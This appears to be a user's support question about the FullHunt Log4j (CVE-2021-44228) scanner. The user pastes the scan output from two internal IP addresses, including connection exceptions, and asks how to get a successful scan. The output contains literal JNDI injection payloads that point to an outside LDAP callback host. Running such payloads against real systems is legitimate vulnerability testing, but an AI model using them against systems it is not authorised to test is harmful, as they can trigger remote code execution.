I get this exception every time I run the scan-
�[32m[•] CVE-2021-44228 - Apache Log4j RCE Scanner�[0m �[33m[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.�[0m �[33m[•] Secure your External Attack Surface with FullHunt.io.�[0m [•] Initiating DNS callback server (interact.sh).�[0m �[35m[%] Checking for Log4j RCE CVE-2021-44228.�[0m �[35m[•] URL: http://10.0.1.20�[0m �[36m[•] URL: http://10.0.1.20 | PAYLOAD: ${jndi:ldap://10.0.1.20.722c2m4t0v27409f82616l5447r39yqnn.interact.sh/iop8d00}�[0m �[35m[•] URL: http://10.0.30.20�[0m �[36m[•] URL: http://10.0.30.20 | PAYLOAD: ${jndi:ldap://10.0.30.20.722c2m4t0v27409f82616l5447r39yqnn.interact.sh/n0qzwem}�[0m EXCEPTION: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))�[0m EXCEPTION: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))�[0m EXCEPTION: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))�[0m �[36m[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.�[0m �[36m[•] Waiting...�[0m �[32m[•] Targets do not seem to be vulnerable.�[0m
Not sure what arguments I need to add to get a successful scan?